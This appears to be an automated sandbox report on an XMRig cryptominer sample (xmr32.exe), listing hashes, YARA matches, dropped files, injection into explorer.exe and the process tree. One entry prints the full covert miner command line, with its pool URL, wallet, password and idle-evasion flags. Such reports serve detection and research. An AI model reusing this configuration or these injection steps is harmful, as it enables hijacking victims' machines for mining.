xmrig | 029a7355d63e6f45f6a0994a7ec3cf611041d3f4740103c52f877134d8c537b2

General

Target

xmr32.exe
Size

2.1MB
MD5

48f18e19ec50d9f27683b25cf3a49024
SHA1

8b486e0308ee2be67882c29b2dc0c4f1ed7a64d2
SHA256

029a7355d63e6f45f6a0994a7ec3cf611041d3f4740103c52f877134d8c537b2
SHA512

6c2673a826578a1e76b35a1b5c39d1db421dc7a22b7b158221a70ef3df80eb7778c19c9469136d3d7f049584b7fcef55ff003acdd0948cb5ef5eeef88ff68839

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/900-64-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/900-65-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/900-66-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/900-67-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/900-68-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/900-69-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/900-70-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/900-71-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/900-72-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/900-74-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/900-80-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

sihost64.exe

pid process

316 sihost64.exe
Loads dropped DLL 2 IoCs

Processes:

xmr32.exe

pid process

368 xmr32.exe
368 xmr32.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

xmr32.exe

description pid process target process

PID 368 set thread context of 900 368 xmr32.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

xmr32.exe

pid process

368 xmr32.exe
368 xmr32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

xmr32.exe

description pid process

Token: SeDebugPrivilege 368 xmr32.exe

pid	process
316	sihost64.exe

pid	process
368	xmr32.exe
368	xmr32.exe

description	pid	process	target process
PID 368 set thread context of 900	368	xmr32.exe	explorer.exe

pid	process
368	xmr32.exe
368	xmr32.exe

description	pid	process
Token: SeDebugPrivilege	368	xmr32.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

xmr32.exesihost64.exe

description	pid	process	target process
PID 368 wrote to memory of 316	368	xmr32.exe	sihost64.exe
PID 368 wrote to memory of 316	368	xmr32.exe	sihost64.exe
PID 368 wrote to memory of 316	368	xmr32.exe	sihost64.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 316 wrote to memory of 1644	316	sihost64.exe	conhost.exe
PID 316 wrote to memory of 1644	316	sihost64.exe	conhost.exe
PID 316 wrote to memory of 1644	316	sihost64.exe	conhost.exe
PID 316 wrote to memory of 1644	316	sihost64.exe	conhost.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe
PID 368 wrote to memory of 900	368	xmr32.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\xmr32.exe
"C:\Users\Admin\AppData\Local\Temp\xmr32.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:368

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
3⤵
PID:1644

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:Resurs2002 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQsSAkqXQPQmCKZaoQj --pass=Resurs2002 --cpu-max-threads-hint=60 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BL+7/uF3iLNMa8rlX540PWXNgzMEiLKXoSaV7J1v2zP" --cinit-idle-wait=1 --cinit-idle-cpu=80 --tls
2⤵
PID:900

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
74017c854386313d41e56eb6708885a2

SHA1
5e60a1560c78f4ac472096e7c50ad6e0534eab90

SHA256
4e9ff171919fdf0fb37b55fc467cf936f5edb1cbb75af0e936c3772dd11a8119

SHA512
796b9e1c691fadf6c2b6f3f4ae95136ade7b61a52ab5ac9e7b26005b1a89481505aa9d1db7744bf97fedc13fe47484f2334bde171b644511e6f2bf1bab0a158d

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
74017c854386313d41e56eb6708885a2

SHA1
5e60a1560c78f4ac472096e7c50ad6e0534eab90

SHA256
4e9ff171919fdf0fb37b55fc467cf936f5edb1cbb75af0e936c3772dd11a8119

SHA512
796b9e1c691fadf6c2b6f3f4ae95136ade7b61a52ab5ac9e7b26005b1a89481505aa9d1db7744bf97fedc13fe47484f2334bde171b644511e6f2bf1bab0a158d

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
74017c854386313d41e56eb6708885a2

SHA1
5e60a1560c78f4ac472096e7c50ad6e0534eab90

SHA256
4e9ff171919fdf0fb37b55fc467cf936f5edb1cbb75af0e936c3772dd11a8119

SHA512
796b9e1c691fadf6c2b6f3f4ae95136ade7b61a52ab5ac9e7b26005b1a89481505aa9d1db7744bf97fedc13fe47484f2334bde171b644511e6f2bf1bab0a158d

Download Submit
memory/316-58-0x0000000000000000-mapping.dmp

Download
memory/368-62-0x000000001BEC0000-0x000000001BEC2000-memory.dmp

Filesize
8KB

Download
memory/368-54-0x000000013F6F0000-0x000000013F6F1000-memory.dmp

Filesize
4KB

Download
memory/900-69-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-72-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-63-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-64-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-65-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-66-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-67-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-68-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-60-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-70-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-71-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-61-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-80-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-74-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/900-76-0x000000014030F3F8-mapping.dmp

Download
memory/900-77-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/1644-78-0x00000000000A0000-0x00000000000A6000-memory.dmp

Filesize
24KB

Download
memory/1644-82-0x000000001ACD6000-0x000000001ACD7000-memory.dmp

Filesize
4KB

Download
memory/1644-81-0x000000001ACD4000-0x000000001ACD6000-memory.dmp

Filesize
8KB

Download
memory/1644-73-0x0000000001C40000-0x0000000001C42000-memory.dmp

Filesize
8KB

Download
memory/1644-79-0x000000001ACD2000-0x000000001ACD4000-memory.dmp

Filesize
8KB

Download
memory/1644-83-0x000000001ACD7000-0x000000001ACD8000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing